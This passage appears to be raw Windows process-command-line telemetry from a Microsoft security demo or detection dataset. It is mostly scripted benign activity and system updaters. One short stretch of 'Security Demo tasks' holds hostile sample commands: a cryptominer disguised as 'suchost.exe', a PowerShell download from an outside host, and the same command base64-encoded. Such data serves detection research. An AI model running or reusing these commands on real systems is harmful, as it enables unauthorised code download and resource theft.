-Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"nan\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"nan\",\"cmd.exe /c c:\\\\Diagnostics\\\\WinSimulateAlerts.cmd c:\\\\W!ndows\\\\System32 2\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd  /c echo Begin Security Demo tasks\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\".\\\\suchost.exe   -a cryptonight -o bcn -u bond007.01 -p x -t 4\",\".\\\\powershell  -Noninteractive -Noprofile -Command \\\"Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://wh401k.org/getps\\\"\",\".\\\\powershell  -enc LU5vbmludGVyYWN0aXZlIC1Ob3Byb2ZpbGUgLUNvbW1hbmQgIkludm9rZS1FeHByZXNzaW9uIEdldC1Qcm9jZXNzOyBJbnZva2UtV2ViUmVxdWVzdCAtVXJpIGh0dHA6Ly93aDQwMWsub3JnL2dldHBzIg==\",\"cmd  /c echo End Security Demo tasks\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\system32\\\\speech_onecore\\\\common\\\\SpeechModelDownload.exe\",\"C:\\\\Windows\\\\System32\\\\wsqmcons.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 200\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping  127.0.0.1 -n 8 \",\"reg  c:\\\\diagnostics\\\\WinBenignActivity.cmd -10918 /22284\",\"ping  127.0.0.1 -n 17 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 0 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd -15855\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -15855\\\"\",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -6735 /25041\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -11793\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -17426 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"rundll32  \\\\26415\\\\9105.exe\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -18973 c:\\\\temp\\\\23899\\\\24432.ps1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" C:\\\\diagnostics\\\\WinBenignActivity.cmd -18973 c:\\\\temp\\\\23899\\\\24432.ps1\\\"\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping  127.0.0.1 -n 14 \",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -17484 /10137\",\"ping  127.0.0.1 -n 14 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 14 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -15720\",\"ping  127.0.0.1 -n 14 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 14 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 14 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -11278 \",\"ping  127.0.0.1 -n 14 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 14 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 14 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 14 \",\"rundll32  \\\\15840\\\\26443.exe\",\"ping  127.0.0.1 -n 14 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -4630 c:\\\\temp\\\\25730\\\\15188.ps1\",\"ping  127.0.0.1 -n 14 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 14 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 14 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 19 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 23 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 14 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -1140 \",\"ping  127.0.0.1 -n 18 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 28 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 14 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 17 \",\"rundll32  \\\\18091\\\\18975.exe\",\"ping  127.0.0.1 -n 26 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -2752 c:\\\\temp\\\\12730\\\\16896.ps1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" c:\\\\diagnostics\\\\WinBenignActivity.cmd -2752 c:\\\\temp\\\\12730\\\\16896.ps1\\\"\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping  127.0.0.1 -n 26 \",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -1926 /21875\",\"ping  127.0.0.1 -n 26 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -7320\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -7320\\\"\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -10353 /21160\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -14766\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -3438 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"rundll32  \\\\29395\\\\14699.exe\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -20237 c:\\\\temp\\\\2708\\\\27344.ps1\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -18087 \",\"ping  127.0.0.1 -n 26 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"rundll32  \\\\24535\\\\23154.exe\",\"ping  127.0.0.1 -n 26 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -10518 c:\\\\temp\\\\25582\\\\18184.ps1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" C:\\\\diagnostics\\\\WinBenignActivity.cmd -10518 c:\\\\temp\\\\25582\\\\18184.ps1\\\"\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping  127.0.0.1 -n 26 \",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -29592 /10339\",\"ping  127.0.0.1 -n 26 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -25460\",\"ping  127.0.0.1 -n 26 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -564 \",\"ping  127.0.0.1 -n 26 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"rundll32  \\\\12420\\\\28156.exe\",\"ping  127.0.0.1 -n 26 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -25005 c:\\\\temp\\\\13896\\\\18724.ps1\",\"ping  127.0.0.1 -n 26 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 29 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 8 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 19 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 200\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping  127.0.0.1 -n 6 \",\"reg  c:\\\\diagnostics\\\\WinBenignActivity.cmd -14404 /9352\",\"ping  127.0.0.1 -n 25 \",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 200\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping  127.0.0.1 -n 8 \",\"reg  c:\\\\diagnostics\\\\WinBenignActivity.cmd -23146 /32625\",\"ping  127.0.0.1 -n 9 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 3 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd -9090\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -9090\\\"\",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -20009 /26500\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -14236\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -15522 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"rundll32  \\\\6038\\\\18193.exe\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -19863 c:\\\\temp\\\\5632\\\\6712.ps1\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 11 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 29 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 20 \",\"ping  127.0.0.1 -n 22 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 2 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 2 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\system32\\\\appidcertstorecheck.exe\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"taskhostw.exe\",\"C:\\\\Windows\\\\system32\\\\AppHostRegistrationVerifier.exe\",\"C:\\\\Windows\\\\system32\\\\usoclient.exe StartScan\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 200\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping  127.0.0.1 -n 11 \",\"reg  c:\\\\diagnostics\\\\WinBenignActivity.cmd -29451 /17352\",\"ping  127.0.0.1 -n 18 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 19 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd -22746\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -22746\\\"\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -32357 /19904\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -6768\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -2077 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"rundll32  \\\\557\\\\12356.exe\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -23465 c:\\\\temp\\\\11303\\\\1053.ps1\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 14 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 30 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 16 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -22744 \",\"ping  127.0.0.1 -n 26 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 12 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 6 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 1 \",\"rundll32  \\\\28294\\\\1236.exe\",\"ping  127.0.0.1 -n 24 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -27872 c:\\\\temp\\\\25394\\\\262.ps1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" c:\\\\diagnostics\\\\WinBenignActivity.cmd -27872 c:\\\\temp\\\\25394\\\\262.ps1\\\"\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping  127.0.0.1 -n 24 \",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -21672 /6837\",\"ping  127.0.0.1 -n 24 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 24 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -2162\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -2162\\\"\",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -9125 /15106\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -22743\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -9472 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"rundll32  \\\\24845\\\\2750.exe\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -30329 c:\\\\temp\\\\9676\\\\24368.ps1\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" 